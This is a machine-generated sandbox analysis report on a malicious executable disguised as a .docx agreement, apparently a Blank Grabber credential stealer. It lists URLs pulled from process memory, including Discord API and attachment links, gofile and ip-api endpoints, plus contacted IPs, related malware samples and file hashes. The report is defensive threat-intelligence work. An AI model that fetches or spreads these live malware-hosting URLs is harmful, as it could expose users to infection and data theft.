                                                                      https://www.msn.comchost.exe, 00000011.00000002.2376962492.0000016E189EC000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://discord.com/api/v9/users/chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963chost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            http://cacerts.digichost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://peps.python.org/pep-0205/chost.exe, 00000011.00000003.2032563848.0000016E17227000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372528563.0000016E170B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                https://www.reddit.com/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000019.00000002.2104672027.0000025739CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004F.00000002.2251813408.0000014E00297000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://www.amazon.ca/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000C.00000003.1975407820.00000266524C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamechost.exe, 00000011.00000002.2372116588.0000016E16C70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxychost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688chost.exe, 00000011.00000002.2372116588.0000016E16C70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              https://www.ebay.co.uk/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000019.00000002.2104672027.0000025739ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://www.ebay.de/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codechost.exe, 00000011.00000002.2372116588.0000016E16CEC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      https://go.micropowershell.exe, 0000004F.00000002.2251813408.0000014E00916000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerchost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://www.amazon.com/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            https://github.com/python/cpython/issues/86361.chost.exe, 00000011.00000003.2370358863.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048172933.0000016E1795E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372629701.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2060721109.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://httpbin.org/chost.exe, 00000011.00000003.2070118152.0000016E176E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://crl.ver)svchost.exe, 0000000C.00000002.2916774796.0000026652200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0schost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulechost.exe, 00000011.00000002.2372423656.0000016E16FB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E177E0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E17889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cacheschost.exe, 00000011.00000002.2372423656.0000016E16FB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            https://www.ecosia.org/newtab/chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brchost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224958579.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2202547693.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E1772C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://www.youtube.com/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  https://allegro.pl/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.gchost.exe, 00000011.00000003.2369453832.0000016E176AF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2371220047.0000016E17EE4000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373443919.0000016E176B5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370287171.0000016E176FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535chost.exe, 00000011.00000002.2373248659.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E17961000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E175FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sychost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://MD8.mozilla.org/1/mchost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            https://www.python.org/psf/license/chost.exe, 00000011.00000002.2383172319.00007FFDF7956000.00000040.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                              https://www.bbc.co.uk/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                https://bugzilla.mochost.exe, 00000011.00000002.2376962492.0000016E1899C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  https://cdn.discordapp.com/attachments/1267176354575683617/1314299600026468442/Blank-user.rar?ex=67chost.exe, 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://github.com/python/importlib_metadata/wiki/Development-Methodologychost.exe, 00000011.00000002.2376637980.0000016E18400000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2069822813.0000016E1767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000019.00000002.2104672027.0000025739ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://google.com/mailchost.exe, 00000011.00000003.2053657547.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://packaging.python.org/specifications/entry-points/chost.exe, 00000011.00000002.2376637980.0000016E18424000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Exampleschost.exe, 00000011.00000003.2368767650.0000016E177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://www.python.org/psf/license/)chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pychost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://www.google.com/chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.iqiyi.com/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://foss.heptapod.net/pypy/pypy/-/issues/3539chost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.chost.exe, 00000011.00000002.2372251589.0000016E16E1F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2069822813.0000016E1767E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17672000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17672000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://google.com/chost.exe, 00000011.00000003.2370358863.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372629701.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2060721109.0000016E1731D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFchost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://ocsp.sectigo.com0chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://tools.ietf.org/html/rfc7231#section-4.3.6)chost.exe, 00000011.00000002.2372251589.0000016E16E1F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2049162957.0000016E17941000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://discordapp.com/api/v9/users/chost.exe, 00000011.00000002.2372528563.0000016E170B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcechost.exe, 00000011.00000002.2372116588.0000016E16CEC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specchost.exe, 00000011.00000002.2372116588.0000016E16CEC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2920chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224232061.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E176DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E177E0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E17889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datachost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://yahoo.com/chost.exe, 00000011.00000003.2053657547.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://account.bellmedia.cchost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6chost.exe, 00000011.00000002.2373846136.0000016E17961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000000C.00000003.1975407820.00000266524C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://login.microsoftonline.comchost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18974000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18A00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://crl.thawte.com/ThawteTimestampingCA.crl0chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://html.spec.whatwg.org/multipage/chost.exe, 00000011.00000002.2373846136.0000016E17900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://www.ifeng.com/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://media.discordapp.net/attachments/1267176354575683617/1314299600026468442/Blank-user.rar?ex=chost.exe, 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningschost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://www.zhihu.com/chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installchost.exe, 00000011.00000003.2368767650.0000016E177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://www.rfc-editor.org/rfc/rfc8259#section-8.1chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://api.gofile.io/getServerchost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngchost.exe, 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://sectigo.com/CPS0chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                      208.95.112.1
                                                                                                                                                                                                                                      ip-api.comUnited States
                                                                                                                                                                                                                                      53334TUT-ASUStrue
                                                                                                                                                                                                                                      162.159.138.232
                                                                                                                                                                                                                                      discord.comUnited States
                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                      185.199.109.133
                                                                                                                                                                                                                                      objects.githubusercontent.comNetherlands
                                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                                      20.233.83.145
                                                                                                                                                                                                                                      github.comUnited States
                                                                                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                      127.0.0.1
                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                      Analysis ID:1569492
                                                                                                                                                                                                                                      Start date and time:2024-12-05 19:35:22 +01:00
                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                      Overall analysis duration:0h 13m 8s
                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                      Number of analysed new started processes analysed:123
                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                      Sample name:Cooperative Agreement0000800380.docx.exe
                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                      Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@188/104@6/5
                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 50%
                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 84%
                                                                                                                                                                                                                                      • Number of executed functions: 122
                                                                                                                                                                                                                                      • Number of non-executed functions: 191
                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, RuntimeBroker.exe, SIHClient.exe, Microsoft.Photos.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 172.217.17.35
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 7408 because there are no executed function
                                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7320 because it is empty
                                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7416 because it is empty
                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                      • VT rate limit hit for: Cooperative Agreement0000800380.docx.exe
                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                      13:36:13API Interceptor238x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                      13:36:42API Interceptor1x Sleep call for process: dllhost.exe modified
                                                                                                                                                                                                                                      13:36:43API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                      13:36:53API Interceptor4x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                      13:36:55API Interceptor1781x Sleep call for process: Cooperative Agreement0000800380.docx.exe modified
                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      discord.comhttps___files.catbox.moe_l2rczc.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.159.135.232
                                                                                                                                                                                                                                      VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                      • 162.159.136.232
                                                                                                                                                                                                                                      5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.159.136.232
                                                                                                                                                                                                                                      speedymaqing.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                                      main.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                                                                                                                                                                                                                                      • 162.159.135.232
                                                                                                                                                                                                                                      EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                      • 162.159.137.232
                                                                                                                                                                                                                                      cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                                      spacers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                                      EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                                      program.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                      • 162.159.137.232
                                                                                                                                                                                                                                      github.com1.exeGet hashmaliciousHavoc, RUSTDESKBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      Ttok18.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                                                                                      TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      TT18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                      Entropy (8bit):1.307370913155731
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr1:KooCEYhgYEL0In
                                                                                                                                                                                                                                      MD5:68F35C20406BBD345DE5508C12E7519D
                                                                                                                                                                                                                                      SHA1:95746A210C2029861D8399B75C15B476729733C1
